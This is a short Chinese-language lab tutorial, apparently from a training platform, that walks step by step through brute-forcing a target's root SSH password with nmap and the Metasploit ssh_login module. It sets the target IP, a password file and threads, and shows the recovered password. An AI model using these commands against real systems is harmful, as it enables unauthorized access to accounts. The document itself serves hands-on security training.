Metasploit对目标主机SSH爆破
实验原理:
1) 靶机root用户存在弱口令漏洞,利用枚举的方法破解目标主机ssh服务。
实验步骤:
一、利用nmap工具扫描目标主机
1.1 使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。
1.2 在终端中输入命令“nmap –sV -O 192.168.1.3”,对目标主机进行端口扫描,发现开放22端口。
1.3 在终端中输入命令“msfconsole”,启动MSF终端
1.4 在终端中输入命令“search ssh_login”,搜索ssh_login的相关工具和攻击载荷。
1.5 在终端中输入命令“use auxiliary/scanner/ssh/ssh_login”,启用漏洞利用模块, 提示符就会提示进入到该路径下。
1.6 在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数。
1.7 在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。
1.8 在终端中输入“set USERNAME root”,指定登陆用户名root。
1.9 在终端中输入“set PASS_FILE /home/passwd.txt”,设置暴利破解的密码文件路径。
1.10 在终端中输入“set THREADS 50”,设置暴利破解的线程数为50。
1.11 在终端中输入“run”, 开始向目标主机爆破ssh的登陆帐号和密码,登陆帐号为root,密码为Simplexue123。
1.12 在终端中输入“ssh rootz@192.168.1.3”,连接目标主机,然后查看网卡信息。